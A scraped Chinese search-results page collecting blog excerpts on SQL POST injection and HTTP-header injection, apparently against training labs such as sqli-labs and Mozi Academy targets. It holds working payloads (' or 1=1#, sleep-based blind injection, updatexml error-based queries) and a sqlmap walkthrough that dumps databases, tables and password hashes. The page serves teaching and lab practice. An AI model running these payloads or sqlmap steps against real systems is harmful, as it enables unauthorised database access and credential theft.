精华内容
下载资源
问答
  • post注入

    2019-10-08 11:23:49
    通过查看请求头发现是post请求 在搜索框中输入1’报错,并返回报错语句 输入1‘# 页面正常,说明此处存在注入 搜索game、2018等字符发现页面没有变化,搜索到了结果但不显示 搜索其他字符使页面发生变化 )无变化 ...

    先观察网站,发现有一个搜索框,输入1测试,页面并没有变化
    在这里插入图片描述
    通过查看请求头发现是post请求
    在这里插入图片描述
    在搜索框中输入1’报错,并返回报错语句
    在这里插入图片描述
    输入1‘# 页面正常,说明此处存在注入

    搜索game、2018等字符发现页面没有变化,搜索到了结果但不显示
    搜索其他字符使页面发生变化
    )无变化
    “无变化
    ‘报错
    在这里插入图片描述

    因为页面不会发生变化,通过union 布尔查询没有用,使用延时查询进行注入
    搜索’ and sleep(3) #让页面等待3秒,但是结果是秒开?为什么?
    搜索’ and sleep(30) # 秒开
    搜索’ and sleep(3000) # 秒开
    sql语句后面是WHERE content=’’,有可能是没有查到数据的原因
    使用or 进行测试
    ‘or sleep(3)#
    页面延时,后面的flag内容按照之前猜测的方法进行

    展开全文
  • SQL注入——POST注入 HEAD注入 POST注入介绍 POST注入属于注入的一种,相信大家都知道POST和GET两种传参方式。 POST注入就是使用POST进行传参的注入,本质上和GET类型没什么区别。POST一般而言不会进行URL编码,但是...

    SQL注入——POST注入 HEAD注入

    POST注入介绍
    POST注入属于注入的一种,相信大家都知道POST和GET两种传参方式。
    POST注入就是使用POST进行传参的注入,本质上和GET类型没什么区别。POST一般而言不会进行URL编码,但是GET会。

    POST注入高危点:
    登录框
    查询框
    各种与数据库有交互的框

    最经典的POST注入莫过于万能密码:
    ’ or 1=1#
    万能密码原理:
    select username,password from users where username=‘admin’ and password = ’ ‘or 1=1%23’ limit 0,1(我们来看着语句逻辑,where后面是条件,username和password之间是and连接,所以两个有一个为否返回就是否,但是or 1=1,这个返回真,否 or 真=真)
    下面墨者学院的这个靶场正是用到了万能密码绕过
    在这里插入图片描述至于注入方式的话,跟前面的显错注入类似。

    SQLMAP如何跑POST注入
    –forms sqlmap 去读取页面中POST传参的表单的传参名然后进行注入。
    -r 1.txt sqlmap 读取数据包文件进行sql注入,注入处可以打一个*号告诉sqlmap测试那个点。

    Head注入介绍
    PHP全局变量——超全局变量
    php中的许多预定义变量都是超全局的,这意味着它们在一个脚本的全部作用域中都可用。
    超全局变量有:
    $_REQUEST 获取GET/POST/COOKIE方式的传参,COOKIE在新版已经无法获取了
    $_POST 获取POST传参
    $_GET 获取GET传参
    $_COOKIE 获取COOKIE的值
    $_SERVER 包含了诸如头信息(header)、路径(path)、以及脚本位置等信息的数组。

    常用的:
    $_SERVER[‘HTTP_HOST’] 请求头信息中的host内容,获取当前域名
    $_SERVER[‘HTTP_USER_AGENT’] 获取用户相关信息,包括用户浏览器、操作系统等信息。
    $_SERVER[‘REMOTE_ADDR’] 浏览网页的用户ip

    head注入原理
    利用了php的全局变量$_server获取用户的相关信息且将数据存入数据库,利用updatexml函数输入sql语句,返回信息。

    updatexml()
    updatexml()是更新xml文档的函数
    语法:updatexml(目标xm内容,xml文档路径,更新的内容)
    实际上这里是去更新了XML文档,但是我们在xml文档路径的位置里面写入了子查询,我们输入特殊字符,然后就因为不符合输入规则报错了。但是报错的时候其实已经执行了那个子查询代码。

    0x7e实际是16进制,mysql支持16进制,但是开头得写0x,0x7e是一个特殊符号,然后不符合路径规则报错。
    在这里插入图片描述updatexm() 这个函数一般是配合and或者or使用的,他和联合查询不同,不需要在意什么字段数
    select *from news where id=1 and updatexml(1,concat(0x7e,(select database()),0x7e),1)
    需要注意的是,and情况下只要一个为false,就会判断是false,所以如果and前面的条件不成立的情况下,就不会执行之后的语句,这里建议使用or

    某些没有回显盲注也可以用这个updatexml()做出来。
    但是报错一般有长度限制,不能输出太长的数据,尽量不要使用group_concat()。
    有些盲注也可以试试看报错注入,因为有时候报错注入的致命错误会显示出来,数据库只忽略普通报错。

    展开全文
  • SQL注入之post注入

    千次阅读 2019-12-06 02:46:51
    Post注入: 一般存在搜索框或登入页面位置,需要用burp抓包查看。 可以看到post数据中nama表单传的值为hack 用hackbar插件post数据中将传的值后面输入单引号或and 或 order by测试 输入单引号报错,查不到任何数据...

    Post注入:

    一般存在搜索框或登入页面位置,需要用burp抓包查看。

    可以看到post数据中nama表单传的值为hack
    用hackbar插件post数据中将传的值后面输入单引号或and 或 order by测试
    在这里插入图片描述
    输入单引号报错,查不到任何数据,由此判断存在post注入。
    在这里插入图片描述
    由于测试的为搜索框所以测试语句为%%27%23,才能正常查询出数据
    注意在hackbar中是需要url编码才可以。
    在这里插入图片描述
    确定存在post注入,也确定注入类型为搜索型注入,既可以构造搜索型注入语句。
    之后可以通过内联注入来获取数据了。

    展开全文
  • sqlmap学习笔记——sql注入post注入

    万次阅读 2019-11-16 14:42:06
    sqlmap学习笔记——sql注入post注入 工作环境:kali-Linux、win10 靶机:墨子学院提供的用于post漏洞SQL注入的靶机 使用到的软件:wireshark、sqlmap 先随便提交一个表单,然后在windows下用wireshark捕捉了post请求...

    sqlmap学习笔记——sql注入post注入

    工作环境:kali-Linux、win10

    靶机:墨子学院提供的用于post漏洞SQL注入的靶机

    使用到的软件:wireshark、sqlmap

    在靶机网站,先随便提交一个表单,然后在windows下用wireshark捕捉了post请求的内容,post请求内容如下:

    POST /login.php HTTP/1.1
    Host: 219.153.49.228:47263
    Connection: keep-alive
    Content-Length: 25
    Cache-Control: max-age=0
    Origin: http://219.153.49.228:47263
    Upgrade-Insecure-Requests: 1
    Content-Type: application/x-www-form-urlencoded
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.97 Safari/537.36
    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3
    Referer: http://219.153.49.228:47263/
    Accept-Encoding: gzip, deflate
    Accept-Language: zh-CN,zh;q=0.9
    
    name=admin&password=adminHTTP/1.1 200 OK
    Server: nginx/1.10.3 (Ubuntu)
    Date: Sat, 16 Nov 2019 05:32:40 GMT
    Content-Type: text/html;Charset=utf-8;charset=UTF-8
    Transfer-Encoding: chunked
    Connection: keep-alive
    Content-Encoding: gzip
    
    ...<script>alert(".....................");window.history.back();</script>
    

    将post请求到的所有的内容全部写入kali-linux的一个文本server_post.txt

    在kali里面运行

    sqlmap -r server_post.txt
    

    然后等待扫描结果

    sqlmap identified the following injection point(s) with a total of 133 HTTP(s) requests:
    ---
    Parameter: name (POST)
        Type: time-based blind
        Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
        Payload: name=admin' AND (SELECT 3126 FROM (SELECT(SLEEP(5)))WwGL) AND 'aQhE'='aQhE&password=adminHTTP/1.1 200 OK
    Server: nginx/1.10.3 (Ubuntu)
    Date: Fri, 15 Nov 2019 10:31:39 GMT
    Content-Type: text/html;Charset=utf-8;charset=UTF-8
    Transfer-Encoding: chunked
    Connection: keep-alive
    Content-Encoding: gzip
    
    ...<script>alert(".....................");window.history.back();</script>
    
        Type: UNION query
        Title: Generic UNION query (NULL) - 4 columns
        Payload: name=admin' UNION ALL SELECT CONCAT(0x716a6b6a71,0x4c736970564156577a4c4849615157696e55464368624d6b48506a6f497056586e6c74486c6a5250,0x71706b7671),62,62-- zeSV&password=adminHTTP/1.1 200 OK
    Server: nginx/1.10.3 (Ubuntu)
    Date: Fri, 15 Nov 2019 10:31:39 GMT
    Content-Type: text/html;Charset=utf-8;charset=UTF-8
    Transfer-Encoding: chunked
    Connection: keep-alive
    Content-Encoding: gzip
    
    ...<script>alert(".....................");window.history.back();</script>
    

    然后查看所有数据库

    sqlmap -r server_post.txt --dbs
    

    内容如下

    available databases [5]:
    [*] information_schema
    [*] mozhe_Discuz_StormGroup
    [*] mysql
    [*] performance_schema
    [*] sys
    

    查看当前数据库

    sqlmap -r server_post.txt --current-db 
    

    内容如下

    [19:02:32] [INFO] fetching current database
    current database: 'mozhe_Discuz_StormGroup'
    

    查看数据库里面的表

    sqlmap -r server_post.txt -D mozhe_Discuz_StormGroup --tables
    

    内容如下

    [19:04:07] [INFO] fetching tables for database: 'mozhe_Discuz_StormGroup'
    [19:04:07] [INFO] used SQL query returns 2 entries
    [19:04:07] [INFO] resumed: 'StormGroup_member'
    [19:04:07] [INFO] resumed: 'notice'
    Database: mozhe_Discuz_StormGroup
    [2 tables]
    +-------------------+
    | StormGroup_member |
    | notice            |
    +-------------------+
    

    查看表的字段

    sqlmap -r server_post.txt -D mozhe_Discuz_StormGroup -T StormGroup_member --columns
    

    内容如下

    Database: mozhe_Discuz_StormGroup
    Table: StormGroup_member
    [4 columns]
    +----------+--------------+
    | Column   | Type         |
    +----------+--------------+
    | id       | int(11)      |
    | name     | varchar(20)  |
    | password | varchar(255) |
    | status   | int(11)      |
    +----------+--------------+
    

    查看用户名跟密码

    sqlmap -r server_post.txt -D mozhe_Discuz_StormGroup -T StormGroup_member -C "name,password" --dump
    

    内容如下

    Database: mozhe_Discuz_StormGroup
    Table: StormGroup_member
    [2 entries]
    +-------+----------------------------------+
    | name  | password                         |
    +-------+----------------------------------+
    | mozhe | 356f589a7df439f6f744ff19bb8092c0 |
    | mozhe | e2d718462e951fbef7a5ef75fcfd0dd3 |
    +-------+----------------------------------+
    

    最后密码拿去md5在线解密网站即可
    https://www.cmd5.com/

    参考链接:

    浅谈sql注入的post注入

    https://bbs.ichunqiu.com/thread-7762-1-1.html?from=bky

    sql注入使用教程

    https://blog.csdn.net/qq1124794084/article/details/77851094

    展开全文
  • 注入全方位利用-POST注入HEAD头注入 一、POST注入介绍 注入攻击的本质,是把用户输入的数据当做代码执行。 这里有两个关键条件: 第一个是用户能够控制输入 第二个是原本程序要执行的代码,拼接了用户输入...
  • sqlmap之POST注入

    2018-10-22 23:09:15
    强烈介意用文件导入来进行注入 ...明显是POST注入 利用sqlmap吧,网上都是用手工注入,我就用sqlmap来试试 先用Burp抓包保存为txt文件 如何用sqlmap sqlmap.py -r "D:/test.txt" -p -id -...
  • sqlmap的post注入

    2019-10-28 14:23:01
    sqlmap的POST注入 cookie注入暴数据库 POST注入 1.验证存在注入 正常数据包"cookie:user=user"修改"cookie:user=admin"后都会出现flag参数 验证Cookie: user=admin’ and ‘1’=1’报错,回显没有flag,说明...
  • (学习)SQL注入-POST注入

    千次阅读 2017-11-21 17:24:22
    SQL注入-POST注入实践
  • 利用sqlmap进行POST注入

    万次阅读 2018-12-24 17:33:43
    利用sqlmap进行POST注入,常见的有三种方法: 注入方式一: 1.用Burp抓包,然后保存抓取到的内容。例如:保存为post.txt,然后把它放至某个目录下 2.列数据库: sqlmap.py -r "c:\Users\fendo\Desktop\post...
  • 特别详细的POST 注入 思路

    千次阅读 2019-04-08 14:21:06
    post注入是通过对输入框进行传参,可以被带入数据库进行的查询 # 注入的两个条件:1.用户可以控制传参,2.用户输入的语句被带入数据库进行查询 1.查询是否有注入点 对输入框填入一些闭合的符号,看页面是否异常 例如...
  • 在这里我们用如下例题进行讲解,本题是我做过的一道SQL注入之POST注入型题,下面开始本教程。 本题为安恒攻防实验室题,连接:http://101.71.29.5:10001/search.jsp  第一步: 因为是POST注入,首先要知道提交...
  • SQLMAP-POST注入

    千次阅读 2018-08-17 15:32:39
    下面就是一次我认为比较典型的sql post注入题型。 抓包,复制出来打成一个txt文件 sqlmap -r test.txt -p admin_name –dbs 因为博主懒的没有在win环境下下载sqlmap,使用kali中自带sqlmap工具。下面简单解释...
  • sql注入——利用burpsuite进行post注入

    千次阅读 2020-02-21 23:23:36
    burpsuite进行post注入 1.打开Burpsuite代理拦截。 2.打开sqli-labs的Less-11进行登录操作 这里我们可以看到拦截到了登录的账号和密码。 3.点击右键选择send repeater(或者按crtl+r)发送给Repeater。然后打...
  • post注入方法

    2019-08-26 18:49:30
    get请求方式的sql注入通过sqlmap -u url+参数 完成 而post方式url中不包含参数,故使用如下方法进行 1、使用burpSite拦截post请求 2、将请求发送到repeater中 3、将请求复制到file 4、执行语句 sqlmap -r 上一...
  • SQL注入POST注入

    2019-04-23 09:11:22
    一、预备知识 二、实验目的 三、实验工具 浏览器、Burpsuite 四、实验环境 客户机一台 五、实验步骤 第一步:访问 http://www.any.com/sqli/Less-11/,页面正常。 第二步:加入单引号会报错。...
  • bypass waf 进行post注入

    2015-01-13 21:13:40
    原标题:轻松绕各种WAF的POST注入、跨站防御(比如安全狗) 轻松绕各种WAF的POST注入、跨站防御(比如安全狗) File: ID: 转载自:http:/
  • get post注入原理

    千次阅读 2013-03-19 01:35:07
    get post注入原理 一般的http请求不外乎 get 和 post两种,如果过滤掉所有post或者get请求中的参数信息中的非法字符,那么也就实现了防SQL注入。  首先定义请求中不能包含如下字符:  '|and|exec|...
  • sqli-labs ————less -11(POST注入

    千次阅读 2018-05-11 11:09:30
    前言从这一关开始,我们就进入到了POST注入的世界了。在接下来的几关中我们将陆续介绍关于POST注入的方法以及技巧。POSTpost是一种数据提交方式,它主要是指数据从客户端提交到服务器端,例如,我们常常使用的用户...
  • Sqlmap的POST注入

    千次阅读 2012-05-08 10:11:58
     很多人刚用sqlmap不知道如何进行post注入,所以这里简单演示下。 F:\Pentest\software\测试软件\sqlmap>python sqlmap.py -u ...
  • aspx后台登陆框post注入实战

    千次阅读 2013-04-18 20:10:11
    摘要:后台登陆框post注入按照注入的方式属于post,和前台搜索型post注入、文本框注入类似,由于目前...后台登陆框post注入按照注入的方式属于post,和前台搜索型post注入、文本框注入类似,由于目前主流的注 入工具
  • POST注入(一)

    千次阅读 2020-07-04 18:50:55
    POST(一) 注入环境:http://inject2.lab.aqlab.cn:81/Pass-05/index.php 攻击流程:  1;判断是否存在sql注入漏洞。  2;判断网页存在字段数。  3;判断回显点。  4;获取信息。  测试开始:  测试目标获取...
  • post注入及提权思路

    千次阅读 2016-01-23 17:47:40
    那么我们来看看是不是存在post注入 Setp1:设置代理     Step2:账户admin密码随意 提交上去 抓个包     把抓到的包复制到本地的一个文本里        Sqlmap走起 Sqlmap -r "/tmp/...
  • sqlmap post注入

    千次阅读 2015-11-19 02:32:16
    0x00 常用的 注入点:http://tetasp.vulnweb.com/Login.asp ...其中search-test.txt的内容为以下所抓的post包 0x01 常参数的 sqlmap -r search-test.txt -p tfUPss 0x02 常参数的 sql
  • 利用burpsite和sqlmap进行post注入

    千次阅读 2017-06-05 11:20:09
    尝试用burpsite和sqlmap进行自动post注入,目标(一道题目)http://120.24.86.145:8002/chengjidan/第一步 用burpsite抓包并保存成txt第二步 用sqlmap语句sqlmap -r 保存的txt文件 -p 需要注入的变量然后我们的注入...
  • Sql注入之做post注入

    2020-09-19 22:11:03
    一、登录做注入的平台(学校靶机) 可以看到url没有出现应该是post传参 二、使用burp suite进行抓包 1、将浏览器换为proxy连接 2、点击页面会与数据库交互的位置得到包 3、选择post数据得到网页具体数据 三、将抓包...

空空如也

空空如也

1 2 3 4 5 ... 20
收藏数 118,479
精华内容 47,391
关键字:

post注入